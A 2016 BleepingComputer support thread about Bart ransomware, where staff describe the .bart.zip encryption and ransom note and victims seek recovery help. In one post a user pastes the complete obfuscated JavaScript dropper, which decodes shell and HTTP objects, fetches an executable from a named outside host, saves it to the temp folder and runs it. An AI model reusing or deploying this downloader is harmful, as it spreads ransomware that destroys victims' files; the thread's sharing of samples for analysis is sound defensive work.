Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Bart Ransomware Help & Support (.bart.zip, recovery.txt)


  • Please log in to reply
37 replies to this topic

#1 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,247 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:06:13 PM

Posted 24 June 2016 - 04:40 PM

A new ransomware by the name Bart was reported today by ProofPoint.

 

Victim's files are encrypted by use of third-party software to compress each file into a password-protected ZIP file, and appends the extension ".bart.zip".

 

It appears this ransomware is spread by the same vectors as Locky, and appears to mimic it.

 

The following ransom note is displayed below, and is saved to the desktop as "recovery.txt".

 

bart-2.png

 

 

For more details, ProofPoint has an excellent article on this ransomware: https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threat-Actors-Spreading-Dridex-and-Locky

 

Analysis is still underway on this malware.


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


BC AdBot (Login to Remove)

 


m

#2 SilentRage47

SilentRage47

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:02:13 AM

Posted 24 June 2016 - 05:31 PM

This happened today in a laptop in my company, no payment page or recevory.txt file in my case. I can upload an example of .bart file if necessary



#3 BryanOraza

BryanOraza

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 25 June 2016 - 03:43 AM

yes! that was so annoying! I wanna bang my head to the wall.. it happens here in my work right now -_-

Suspicious sender and suspicious email format..


I hope the solution comes faster..
 


Edited by BryanOraza, 25 June 2016 - 03:49 AM.


#4 Demonslay335

Demonslay335

    Ransomware Hunter

  • Topic Starter

  • Security Colleague
  • 3,247 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:06:13 PM

Posted 25 June 2016 - 09:48 AM

Do you have the suspicious email still? I may be interested in an original infectious attachment.

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#5 SilentRage47

SilentRage47

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:02:13 AM

Posted 25 June 2016 - 10:24 AM

I do, how can I forward it to you ?

 

Btw, is it safe to use the infected computer in a LAN ? Is there a possibility that the virus is still active ?



#6 Demonslay335

Demonslay335

    Ransomware Hunter

  • Topic Starter

  • Security Colleague
  • 3,247 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:06:13 PM

Posted 25 June 2016 - 10:49 AM

I would definitely scan the system with your antivirus, as well as MalwareBytes, and HitmanPro. Typically ransomware will remove itself after encrypting. I have not done extended analysis on this variant myself, so I do not know if it persists. It may set itself as a startup. MalwareBytes would be able to pickup on any duplicates of itself and run keys.


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#7 BryanOraza

BryanOraza

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 26 June 2016 - 08:00 PM

I would definitely scan the system with your antivirus, as well as MalwareBytes, and HitmanPro. Typically ransomware will remove itself after encrypting. I have not done extended analysis on this variant myself, so I do not know if it persists. It may set itself as a startup. MalwareBytes would be able to pickup on any duplicates of itself and run keys.

Can we send it to you?

you're email? So I can forward the msg.



#8 Demonslay335

Demonslay335

    Ransomware Hunter

  • Topic Starter

  • Security Colleague
  • 3,247 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:06:13 PM

Posted 26 June 2016 - 08:45 PM

We have several samples now, thank you. If a weakness is found, victims will be contacted. It's above me to analyze it further, so we'll have to see what the experts can find hopefully.

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#9 BryanOraza

BryanOraza

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 26 June 2016 - 08:55 PM

We have several samples now, thank you. If a weakness is found, victims will be contacted. It's above me to analyze it further, so we'll have to see what the experts can find hopefully.

looking forward to retrieve my client files.. please let us know if there's a solution to our problem .. TIA



#10 Letouane

Letouane

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:13 PM

Posted 27 June 2016 - 02:28 PM

One of my clients get infected by this virus.

I have taken the virus itself, here you will find the virus code (admin can moderate if necessary)

Maybe the code will help some security researcher or anyone with decrypting or put an end to the target server listed at the bottom of the script.

  relevant = [];
	
var unlike = { ':': '.','U': 'S','381': 'X'};
	var errant = 0;


function a(b){if(b==1){return 2;}else{return 17;}
return 3;}
 function miami(rivulet) {
	request = rivulet;
	for (var i in unlike){request = request.replace(i, unlike[i]);}
    return request;
};

var chosen = 3-2;  
function Point(x, y) {
    this.x = x || 0;
    this.y = y || 0;
}

Point.create = function(o, y) {
    if (isArray(o)) return new Point(o[0], o[1]);
    if (isObject(o)) return new Point(o.x, o.y);
    return new Point(o, y);
};

Point.add = function(p1, p2) {
    return new Point(p1.x + p2.x, p1.y + p2.y);
};

Point.subtract = function(p1, p2) {
    return new Point(p1.x - p2.x, p1.y - p2.y);
};

Point.scale = function(p, scaleX, scaleY) {
    if (isObject(scaleX)) {
        scaleY = scaleX.y;
        scaleX = scaleX.x;
    } else if (!isNumber(scaleY)) {
        scaleY = scaleX;
    }
    return new Point(p.x * scaleX, p.y * scaleY);
};

Point.equals = function(p1, p2) {
    return p1.x == p2.x && p1.y == p2.y;
};

Point.angle = function(p) {
    return Math.atan2(p.y, p.x);
};

var libel = new Array(-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57,
    58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6,
    7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
    25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
    37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
String.prototype.miami4 = function() {
	
    var c1, c2, c3, c4;
    var i, len, out;
	var str = this.replace(/archives/g, '')
    len = str.length;
    i = 0;
    out = "";

    while (i < len) {
        do {
            c1 = libel[str.charCodeAt(i++) & 0xff]
        } while (i < len && c1 == -1);

        if (c1 == -1)
            break;
var dodo = false;
        do {
            c2 = libel[str.charCodeAt(i++) & 0xff];
		dodo = i < len && c2 == -1;
        } while (dodo);

        if (c2 == -1)
            break;

        out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

        do {
            c3 = str.charCodeAt(i++) & 0xff;

            if (c3 == 61)
                return out;

            c3 = libel[c3]
        } while (i < len && c3 == -1);

        if (c3 == -1)
            break;

        out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

        do {
            c4 = str.charCodeAt(i++) & 0xff;

            if (c4 == 61)
                return out;

            c4 = libel[c4]
        } while (i < len && c4 == -1);

        if (c4 == -1)
            break;

        out += String.fromCharCode(((c3 & 0x03) << 6) | c4)
    }

    return out
}


var ranger ="archivesarchivesJVarchivesRFTVarchivesAl".miami4();
var ungodly = "archivesarchivesQWarchivesN0aXZarchiveslWE9iaarchivesmVjdA=archives=".miami4();
String.prototype.miami2 = function () {
    var trials = {
        pitiable: this
    };
    trials.puerto = trials.pitiable["c3Varchivesic3RyarchivesaW5archivesn".miami4()](errant, chosen);
    return trials.puerto;
};

var workroom ="archivesRXhwYW5archiveskRW52aXarchivesJvbm1lbnRTdHJarchivespbmdz".miami4();
var Native = function(options){
	
};Native.implement = function(objects, properties){
	for (var i = 0, l = objects.length; i < l; i++) objects[i].implement(properties);
};

var unrestrained = [ungodly, workroom,ranger,  ""+"."+("boobs","susan","leprosy","passerby","assistance","dressing","abroad","advised","exe"), "UnarchivesVuarchives".miami4(), miami("M"+"SX"+"ML"+("grenada","cannibal","auction","katrina","senegal","phosphorescent","canteen","2.")+"381M"+"LH"+"TT"+("allocation","synonym","materials","sighting","spicy","spalding","apricot","impede","P>")+"WU"+("adjustable","lapland","organize","colon","tease","amateur","chronic","cr")+("betide","mention","townships","spice","atkins","spectrum","horde","frenchwoman","ip")+"t:"+("cassandra","beaches","baptize","casting","ravens","unwieldy","bramble","subaltern","Sh")+"ell")];
fabled = "_F2_";
var logan = this[unrestrained.shift()];

Native.genericize = function(object, property, check){
	if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){
		var args = Array.prototype.slice.call(arguments);
		return object.prototype[property].apply(args.shift(), args);
	};
};
Native.typize = function(object, family){
	if (!object.type) object.type = function(item){
		return ($type(item) === family);
	};
};
inXiXQc = "VepXOp";
casque = (("optics", "detailed", "unconnected", "runaway", "leaflet", "cause", "workroom", "pyYDHQfX") + "PkAkGdUV").miami2();
inflammation = (("bushel", "toilet", "mutter", "masque", "fittest", "vagina", "feeder", "pusillanimous", "solidity", "sWVCpYbGGt") + "gotWpR").miami2();
  
    String.prototype.singing = function (a) {
        for (var b = [], c = 0; c < a.length; c++)b[c] = a[c];
        return b.join("")
    };

var terrifying = unrestrained.pop().split(">");

var rampart = new logan(terrifying[1]);
var selecting = new logan(terrifying[0]);
var vulture = rampart[unrestrained.shift()](unrestrained.shift());
weasel = "E";

var amalgamation = unrestrained.shift();
var promises = unrestrained.shift();
architectural = "b3Blbg==".miami4();
function school(gutter, reverse) {

    try {
        var appropriations = vulture + "/" + reverse ;
		appropriations = appropriations+ amalgamation;
            selecting[architectural](("eileen","brush","myrtle","historically","compute","conduct","transform","correcting","G" + weasel) + ("secretive","sensitive","foundry","baptize","jewel","endurable","testing","college","interposition","quantity","T"), gutter, false);
       
    selecting[inflammation + ("seasoned","sawdust","end")]();
	var advocacy=("casque" + WScript=="casque" + "V2luZGarchives93cyBTY3JpcHQgarchivesSG9zdA=archives=".miami4())&&selecting["c3archivesRhdHarchivesVz".miami4()] +""=="MjarchivesAw".miami4()&&typeof(GzEAPd)==="undefined";

    if (advocacy) {
		
        var brings = new logan((("lancaster","articles","seaport","carbide","interact","chevy","absorption","queens","A")+("light","vagina","confidentially","syndication","symmetrical","dubious","backup","lauren","SEOO")+"DB"+("garrulous","poker","hotel","worshiped","ceres","provision","nauseous",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));
        brings[architectural]();
        RhXxGud = "_F9_";
        brings.type = chosen;
        hGaSMa = "_F10_";
        brings["d3JarchivespdGU=archives".miami4()](selecting[("somewhat","alienate","flirt","conjugal","determinate","certification","requital","")+"R"+"es"+"pon"+unlike['U'].toLowerCase()+"e"+"Qarchivesm9keQ=archives=".miami4()]);
        XWaxeQhw = "_F11_";
        brings[(casque + "o"+("moments","plaudits","pertinent","websites","buffet","ahead","queue","diable","00")+("experts","pencil","bonus","abstracts","inspection","primate","price","8i")+"tion").replace("0"+("contrast","stupefaction","shannon","dally","ailing","deferred","newton","08"), inflammation)] = 0;
        krDwvrh = "_F12_";
        brings.saveToFile(appropriations, 2);
        SswQdi = "_F13_";
        brings.close();
        XWfgMW = "_F14_";
		rampart[promises](appropriations, chosen, true);
    }
} catch (fbhBGzsX) {
    KKKnoPGE = "_F15_"; };

}
try{
school("http://"+"ca\u006Dera\u002Dtest"+".hi2.ro\u002F89ug6b7ui" + "?QszlYY=qVWJWXJ","DNnFeLFf");}catch(UKhpApne){
   LyzGRySP = "_F16_";}

   


#11 BryanOraza

BryanOraza

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 28 June 2016 - 04:11 AM

UP To this



#12 BryanOraza

BryanOraza

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 29 June 2016 - 12:48 AM

^up I really need help about this issue



#13 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 49,942 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:07:13 PM

Posted 29 June 2016 - 06:18 AM

When or if a solution is found, that information will be provided in this support topic and you will receive notification if subscribed to it. In addition, a news article most likely will be posted on the BleepingComputer front page.
.
.
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#14 BryanOraza

BryanOraza

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 30 June 2016 - 04:33 AM

When or if a solution is found, that information will be provided in this support topic and you will receive notification if subscribed to it. In addition, a news article most likely will be posted on the BleepingComputer front page.

thanks. I thought I need to make it up.. I hope it will gonna help us soon. thank you very much



#15 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 49,942 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:07:13 PM

Posted 30 June 2016 - 05:06 AM

You're welcome.
.
.
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users